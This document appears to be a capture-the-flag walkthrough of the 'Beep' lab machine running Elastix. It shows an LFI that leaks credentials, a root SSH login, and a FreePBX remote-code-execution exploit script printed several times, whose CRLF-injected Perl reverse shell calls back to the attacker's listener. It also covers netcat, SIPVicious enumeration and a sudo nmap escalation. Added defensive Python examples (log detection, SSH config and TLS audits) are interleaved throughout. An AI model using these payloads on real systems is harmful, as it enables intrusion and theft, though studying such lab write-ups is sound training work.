Beep

IP: 10.10.10.7

Nmap results:

Open 10.10.10.7:22
Open 10.10.10.7:25
Open 10.10.10.7:80
Open 10.10.10.7:111
Open 10.10.10.7:110
Open 10.10.10.7:143
Open 10.10.10.7:443
Open 10.10.10.7:10000
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_  2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3?
|_pop3-capabilities: USER IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE RESP-CODES TOP UIDL PIPELINING APOP STLS LOGIN-DELAY(0) EXPIRE(NEVER)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            882/udp   status
|_  100024  1            885/tcp   status
143/tcp   open  imap?
|_imap-capabilities: NO Completed MULTIAPPEND UNSELECT STARTTLS ACL OK ID ANNOTATEMORE QUOTA LITERAL+ URLAUTHA0001 IDLE X-NETSCAPE THREAD=REFERENCES LISTEXT CONDSTORE CATENATE UIDPLUS LIST-SUBSCRIBED NAMESPACE IMAP4rev1 SORT=MODSEQ RENAME SORT RIGHTS=kxte BINARY ATOMIC CHILDREN THREAD=ORDEREDSUBJECT IMAP4 MAILBOX-REFERRALS
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_ssl-date: 2023-07-28T17:25:29+00:00; +1s from scanner time.
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-title: Elastix - Login page
993/tcp   open  imaps?
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1

Elastix version: 0.5

Finding vulnerabilities:

searchsploit elastix

Found multiple vulnerabilities.

Solution 1 - LFI

searchsploit -m php/webapps/37637.pl

Found an endpoint that is vulnerable to LFI:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf&module=Accounts&action

It disclosed multiple credentials:
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

#FOPRUN=true
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE

Users:

asterisk
asteriskuser
admin
root

Passwords:

jEhdIekWmdjE
amp109
passw0rd
amp111

So I've got a bunch of users and passwords.

Now what?

Let's first see which users actually exist here via /etc/passwd; that narrows down which accounts to try.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.

That is the first thing you should look at.
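Reading a passwd listing by eye works for one box; the check below is an added example (not from the original write-up) that does the same reduction programmatically: it parses /etc/passwd text, keeps only the accounts whose shell allows an interactive login, and separately lists every UID 0 account. The sample is a constructed subset of the listing above, with a malformed line and the LFI page's "Sorry!" message appended to show that non-passwd lines are skipped. One edge case from the real listing is handled explicitly: the news account has an empty shell field, which the system treats as the default shell, not as "no login".

```python
# Added example (not from the original write-up): reduce an /etc/passwd
# listing to the accounts that can actually log in interactively. These are
# the accounts a defender has to protect first on an exposed host.
NON_INTERACTIVE = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                   "/bin/sync", "/sbin/shutdown", "/sbin/halt"}

# Constructed sample: a few lines from the write-up's listing, plus a
# malformed line and the LFI page's trailing "Sorry!" message.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
news:x:9:13:news:/etc/news:
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:500:500::/home/spamfilter:/bin/bash
fanis:x:501:501::/home/fanis:/bin/bash
this line is not a passwd entry
Sorry! Attempt to access restricted file.
"""


def parse_passwd(text):
    """Yield a dict per well-formed passwd line; skip anything else.

    An empty shell field is legal and means the system default (/bin/sh),
    so it counts as interactive rather than being dropped."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, gid, gecos, home, shell = fields
        if not uid.isdigit() or not gid.isdigit():
            continue
        yield {"name": name, "uid": int(uid), "gid": int(gid),
               "gecos": gecos, "home": home, "shell": shell or "/bin/sh"}


def interactive_accounts(text):
    """Names of accounts whose shell allows an interactive login."""
    return [e["name"] for e in parse_passwd(text)
            if e["shell"] not in NON_INTERACTIVE]


def uid_zero_accounts(text):
    """Every account with UID 0; more than one is a red flag."""
    return [e["name"] for e in parse_passwd(text) if e["uid"] == 0]


if __name__ == "__main__":
    print("interactive:", interactive_accounts(SAMPLE_PASSWD))
    print("uid 0:", uid_zero_accounts(SAMPLE_PASSWD))
```

On the sample this leaves root, news, mysql, asterisk, spamfilter and fanis; sync is excluded because /bin/sync is not a shell. Note that service accounts such as mysql, cyrus and asterisk having /bin/bash is itself worth a finding on a hardened host.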

I tried to SSH in from my Linux machine, but it showed an error: the SSH version the box is running is outdated and only offers insecure algorithms, which is why my machine wasn't connecting to it.

Solving this issue.

After some research, I found this solution.

  • Make a .ssh directory in your home directory:

    mkdir -p ~/.ssh

  • Now create a config file inside it:

    nano ~/.ssh/config

  • Paste the following into it:

Host 10.10.10.7
#Legacy changes
KexAlgorithms +diffie-hellman-group1-sha1,diffie-hellman-group14-sha1
Ciphers +aes128-cbc
HostKeyAlgorithms=+ssh-dss

Alternatively, you can connect to it using PuTTY.
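The config above re-enables SHA-1 key exchange, a CBC cipher and DSA host keys, all of which OpenSSH disabled for good reasons. That is fine for one lab host as long as the lines stay under the Host block; the common mistake is to paste them at the top of ~/.ssh/config, where they apply to every server. The following added example (not from the original write-up) parses an OpenSSH client config and reports each legacy algorithm together with the scope it applies to, so an unscoped one stands out. The sample config is constructed: the write-up's block plus one deliberately global Ciphers line.

```python
# Added example (not from the original write-up): check an OpenSSH client
# config for legacy algorithm options and report whether each one is scoped
# to a single Host block or applies globally. Findings with scope "GLOBAL"
# (no Host block, or "Host *") are the ones to fix.
import re

# Algorithms the write-up has to re-enable, all deprecated by OpenSSH.
LEGACY_ALGOS = {"diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1",
                "aes128-cbc", "ssh-dss"}
ALGO_OPTIONS = {"kexalgorithms", "ciphers", "hostkeyalgorithms"}

# Constructed sample: the write-up's block under a Host entry, plus a global
# (unscoped) Ciphers line to show what the audit should complain about.
SAMPLE_CONFIG = """\
# global section
Ciphers +aes128-cbc

Host 10.10.10.7
#Legacy changes
KexAlgorithms +diffie-hellman-group1-sha1,diffie-hellman-group14-sha1
Ciphers +aes128-cbc
HostKeyAlgorithms=+ssh-dss
"""

# ssh_config accepts "Key value" and "Key=value"; values may be comma lists
# and may start with +, - or ^ to modify the default list.
OPT_RE = re.compile(r"^\s*([A-Za-z]+)\s*(?:=|\s)\s*(.+?)\s*$")


def parse_ssh_config(text):
    """Return a list of (scope, option, [values]); scope None means global."""
    scope, entries = None, []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = OPT_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key in ("host", "match"):
            # "Host *" matches everything, so treat it as global too.
            scope = None if value == "*" else value
            continue
        values = [v.strip() for v in value.lstrip("+-^").split(",") if v.strip()]
        entries.append((scope, key, values))
    return entries


def legacy_findings(text):
    """Sorted (scope_or_GLOBAL, option, algorithm) for each legacy algorithm
    enabled anywhere in the config."""
    findings = set()
    for scope, key, values in parse_ssh_config(text):
        if key not in ALGO_OPTIONS:
            continue
        for algo in values:
            if algo.lower() in LEGACY_ALGOS:
                findings.add((scope or "GLOBAL", key, algo.lower()))
    return sorted(findings)


def global_legacy(text):
    """Only the findings that apply to every host."""
    return [f for f in legacy_findings(text) if f[0] == "GLOBAL"]


if __name__ == "__main__":
    for scope, option, algo in legacy_findings(SAMPLE_CONFIG):
        print(f"{scope:12} {option:18} {algo}")
```

The write-up's own block produces four scoped findings and no global ones, which is the acceptable outcome; the extra global Ciphers line in the sample is the case the check exists to catch.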

user: root

pass: jEhdIekWmdjE

And we are in, as the root user.

root: f965360e0d402ce69bbb38566ddd2e8d

user: a290791a786a1bdcc8a59f81b4f3237a

Solution 2 - Remote Code Execution

The Exploit-DB copy is too old, so I found an updated payload on GitHub.

#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
import ssl
rhost="172.16.254.72"
lhost="172.16.254.223"
lport=443
extension="1000"

ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Change lhost to your tun0 address, set lport, and run the exploit.
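What the payload above actually does is worth spelling out from the defender's side: it smuggles CR/LF sequences (%0D%0A) into the callmenum parameter so that extra "Application:" and "Data:" lines reach Asterisk's call handling, and that shape stays visible in the web server's access log. The following added example (not from the original write-up or the exploit's authors) parses combined-format Apache log lines, decodes each query parameter and reports any that contain a carriage return or line feed, noting the Asterisk keywords when present. The log lines are constructed; the hostile one is a shortened form of the URL the exploit builds.

```python
# Added example (not from the original write-up): detection logic for the
# request shape the exploit above sends. CRLF characters never belong in a
# query parameter, so decoded "\r" or "\n" in one is a reliable signal; the
# "Application:" / "Data:" keywords then tie it to the Asterisk call-file
# injection specifically.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (combined log format). Line 1 is a shortened
# version of the exploit URL, line 4 a lowercase-encoded variant; the
# others are benign.
SAMPLE_LOG = r'''
10.10.16.30 - - [28/Jul/2023:17:30:01 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-e%20%27...%27%0D%0A%0D%0A HTTP/1.1" 200 512 "-" "Python-urllib/3.11"
10.10.16.30 - - [28/Jul/2023:17:30:05 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.2 - - [28/Jul/2023:17:31:00 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.2 - - [28/Jul/2023:17:31:10 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000%0d%0aApplication%3A%20system HTTP/1.1" 500 0 "-" "curl/8.0"
'''

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def parse_access_log(text):
    """Yield a dict per well-formed combined-format line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def crlf_injection_findings(text):
    """Return (src, path, param, reason) for every request whose decoded
    query parameters contain CR or LF."""
    findings = []
    for req in parse_access_log(text):
        parts = urlsplit(req["target"])
        # parse_qs percent-decodes values, so %0D%0A becomes "\r\n".
        params = parse_qs(parts.query, keep_blank_values=True)
        for param, values in params.items():
            for value in values:
                if "\r" not in value and "\n" not in value:
                    continue
                keywords = [k for k in ("Application:", "Data:")
                            if k.lower() in value.lower()]
                reason = "CRLF in parameter"
                if keywords:
                    reason += " with " + "/".join(keywords)
                findings.append((req["src"], parts.path, param, reason))
    return findings


if __name__ == "__main__":
    for finding in crlf_injection_findings(SAMPLE_LOG):
        print(finding)
```

Both encoded forms are caught because the check runs on the decoded value rather than on the literal "%0D%0A" string, which is the mistake a naive grep-based rule makes.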

But I'm getting an error.

So I made some changes.

The Python error "ModuleNotFoundError: No module named 'urllib2'" occurs because the urllib2 module has been split into urllib.request and urllib.response in Python 3.

To solve the error, import the function as: from urllib.request import urlopen

Modified payload:

#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
from urllib.request import urlopen
import ssl
rhost="10.10.10.7"
lhost="10.10.16.30"
lport= "4444"
extension="1000"

#ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Again, another error.

The website is using an outdated TLS version (TLS 1.0), and modern web browsers and libraries refuse to connect to sites that only offer outdated SSL/TLS protocols.

Hence I tried to modify the script to bypass this SSL check, but with no luck.

I found the approach Rana Khalil was using: route the traffic through Burp, and let Burp forward it to the target over SSL without the version check getting in the way.

This also lets us see what's going on in the background by inspecting the traffic in Burp.

To do this, change the following in the script:

rhost = "localhost"
url: change https to http

In Burp, change the following:

Go to Proxy > Options > Proxy Listeners > Add.

In the Binding tab, set the port to 80.

In the Request handling tab, set "Redirect to host" to 10.10.10.7, set "Redirect to port" to 443, and check "Force use of SSL".

So our final payload looks like this:

#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649

############################################################
# Modified by Rahi Islam.
# github: https://github.com/rahisec
############################################################

from urllib.request import urlopen
import ssl
rhost="localhost"
lhost="10.10.16.30"
lport=4444
extension="1000"

ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Now run it, and also start a listener:

nc -lnvp 4444

It runs without error this time, but we still don't get a shell.

Let's check the request in Burp to see what's going on.

The call failed. Maybe we need to change the default extension. We don't know which extension this app is using, but there is a tool that can detect valid extensions on a PBX: the svwar tool from SIPVicious identifies working extension lines.

Installing SIPVicious:

pip install sipvicious

Now run the following command.

sudo sipvicious_svwar -m INVITE -e100-550 10.10.10.7

  • -m: specifies the request method, INVITE.

  • -e: specifies an extension or extension range; in our case 100-550. If we don't find any, we will increase the range.

To be honest, I had to run the tool several times to get this result. 🙂

I was getting these errors.

OK. So the extension the app is using is 233.

Final payload:

#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649

############################################################
# Modified by Rahi Islam.
# github: https://github.com/rahisec
############################################################

from urllib.request import urlopen
import ssl
rhost="localhost"
lhost="10.10.16.30"
lport=4444
extension="233"  #extension has been changed!

ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

And here we go. Finally, we've got the initial shell.

When we visit the webpage, it isn't loading.

Modify the minimum TLS version in Firefox:

  1. Open a new tab in Firefox. Enter "about:config" in the address bar and hit Enter/Return.

  2. In the search box above the list, enter "security.tls.version.min".

  3. Locate the preference named "security.tls.version.min" and change its value to 1.

Q.2.

TLS version:

developer tools > network > security

TLSv1

1.0
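The TLS 1.0 finding explains both the Python failures earlier and the blank page in Firefox, and it is the kind of result that belongs in an audit record rather than a screenshot. The following added example (not from the original write-up) confirms it from the command line: it attempts one handshake per TLS version, each pinned to exactly that version, and turns the results into a verdict. The host and port are arguments with no default for the box; the only assumption is that the client's OpenSSL can still be talked into TLS 1.0 and 1.1 by lowering its security level, which the code attempts and otherwise reports as unsupported.

```python
# Added example (not from the original write-up): check which TLS protocol
# versions a server accepts, so the "TLSv1 / 1.0" observation from the
# browser can be reproduced and tracked as an audit result.
import socket
import ssl
from ssl import TLSVersion


def probe_version(host, port, version, timeout=5.0):
    """Try a handshake pinned to exactly one TLS version.
    Returns True if the server negotiates it, False if it refuses or the
    local OpenSSL cannot offer that version at all."""
    try:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
        ctx.check_hostname = False      # auditing protocol support, not identity
        ctx.verify_mode = ssl.CERT_NONE
        ctx.minimum_version = version
        ctx.maximum_version = version
        if version < TLSVersion.TLSv1_2:
            # OpenSSL 3 hides TLS 1.0/1.1 behind security level 0.
            ctx.set_ciphers("DEFAULT:@SECLEVEL=0")
        with socket.create_connection((host, port), timeout=timeout) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                return tls.version() is not None
    except (ValueError, OSError):       # ssl.SSLError is an OSError
        return False


def supported_versions(host, port):
    """Map each TLS version name to whether the server accepts it."""
    return {v.name: probe_version(host, port, v) for v in
            (TLSVersion.TLSv1, TLSVersion.TLSv1_1,
             TLSVersion.TLSv1_2, TLSVersion.TLSv1_3)}


def assess(results):
    """Turn probe results into a verdict. 'legacy-only' is the Beep case:
    the server speaks nothing a modern client enables by default."""
    modern = results.get("TLSv1_2") or results.get("TLSv1_3")
    legacy = results.get("TLSv1") or results.get("TLSv1_1")
    if modern and not legacy:
        return "modern"
    if modern and legacy:
        return "legacy-enabled"
    if legacy:
        return "legacy-only"
    return "unreachable-or-no-tls"


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2])   # e.g. 10.10.10.7 443
    results = supported_versions(host, port)
    print(results, "->", assess(results))
```

A "legacy-only" verdict is the remediation trigger: the fix is on the server (enable TLS 1.2 or later in Apache's mod_ssl), not lowering security.tls.version.min in every client that needs to reach it.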

Q.2

What is the name of the software that's hosting a webserver on 443?

Elastix

The Elastix software version is disclosed.

A lang directory was found by directory brute force. Visiting that directory and clicking on any language file, e.g. cn.lang, discloses the version.
